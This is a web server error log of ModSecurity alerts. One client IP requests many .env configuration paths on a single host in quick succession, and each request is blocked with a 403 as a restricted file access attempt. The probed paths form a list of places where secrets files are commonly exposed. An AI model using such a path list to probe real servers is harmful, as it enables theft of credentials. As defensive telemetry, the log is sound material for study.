[Sun Jul 27 09:04:50.734558 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /website/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjNQAAABY"]
[Sun Jul 27 09:04:50.734785 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjNQAAABY"]
[Sun Jul 27 09:04:50.734937 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjNQAAABY"]
[Sun Jul 27 09:04:50.756938 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjNgAAABY"]
[Sun Jul 27 09:04:50.757135 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjNgAAABY"]
[Sun Jul 27 09:04:50.757274 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjNgAAABY"]
[Sun Jul 27 09:04:50.779522 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjNwAAABY"]
[Sun Jul 27 09:04:50.779720 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjNwAAABY"]
[Sun Jul 27 09:04:50.779866 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjNwAAABY"]
[Sun Jul 27 09:04:50.801933 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjOAAAABY"]
[Sun Jul 27 09:04:50.802121 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjOAAAABY"]
[Sun Jul 27 09:04:50.802282 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aIXPkuWBJAKUjtGl5KHjOAAAABY"]
[Sun Jul 27 09:04:50.863048 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env_example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aIXPkuWBJAKUjtGl5KHjOgAAABY"]
[Sun Jul 27 09:04:50.863275 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aIXPkuWBJAKUjtGl5KHjOgAAABY"]
[Sun Jul 27 09:04:50.863469 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aIXPkuWBJAKUjtGl5KHjOgAAABY"]
[Sun Jul 27 09:04:50.885740 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aIXPkuWBJAKUjtGl5KHjOwAAABY"]
[Sun Jul 27 09:04:50.885981 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aIXPkuWBJAKUjtGl5KHjOwAAABY"]
[Sun Jul 27 09:04:50.886155 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aIXPkuWBJAKUjtGl5KHjOwAAABY"]
[Sun Jul 27 09:04:50.908522 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aIXPkuWBJAKUjtGl5KHjPAAAABY"]
[Sun Jul 27 09:04:50.908752 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aIXPkuWBJAKUjtGl5KHjPAAAABY"]
[Sun Jul 27 09:04:50.908909 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aIXPkuWBJAKUjtGl5KHjPAAAABY"]
[Sun Jul 27 09:04:50.930986 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aIXPkuWBJAKUjtGl5KHjPQAAABY"]
[Sun Jul 27 09:04:50.931194 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aIXPkuWBJAKUjtGl5KHjPQAAABY"]
[Sun Jul 27 09:04:50.931352 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aIXPkuWBJAKUjtGl5KHjPQAAABY"]
[Sun Jul 27 09:04:50.953394 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aIXPkuWBJAKUjtGl5KHjPgAAABY"]
[Sun Jul 27 09:04:50.953598 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aIXPkuWBJAKUjtGl5KHjPgAAABY"]
[Sun Jul 27 09:04:50.953741 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aIXPkuWBJAKUjtGl5KHjPgAAABY"]
[Sun Jul 27 09:04:51.014467 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aIXPk-WBJAKUjtGl5KHjQAAAABY"]
[Sun Jul 27 09:04:51.014696 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aIXPk-WBJAKUjtGl5KHjQAAAABY"]
[Sun Jul 27 09:04:51.014851 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aIXPk-WBJAKUjtGl5KHjQAAAABY"]
[Sun Jul 27 09:04:51.076479 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aIXPk-WBJAKUjtGl5KHjQgAAABY"]
[Sun Jul 27 09:04:51.076714 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aIXPk-WBJAKUjtGl5KHjQgAAABY"]
[Sun Jul 27 09:04:51.076881 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aIXPk-WBJAKUjtGl5KHjQgAAABY"]
[Sun Jul 27 09:04:51.099478 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aIXPk-WBJAKUjtGl5KHjQwAAABY"]
[Sun Jul 27 09:04:51.099692 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aIXPk-WBJAKUjtGl5KHjQwAAABY"]
[Sun Jul 27 09:04:51.099848 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aIXPk-WBJAKUjtGl5KHjQwAAABY"]
[Sun Jul 27 09:04:51.122100 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aIXPk-WBJAKUjtGl5KHjRAAAABY"]
[Sun Jul 27 09:04:51.122324 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aIXPk-WBJAKUjtGl5KHjRAAAABY"]
[Sun Jul 27 09:04:51.122504 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aIXPk-WBJAKUjtGl5KHjRAAAABY"]
[Sun Jul 27 09:04:51.144498 2025] [:error] [pid 1495876] [client 185.177.72.115:16562] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aIXPk-WBJAKUjtGl5KHjRQAAABY"]
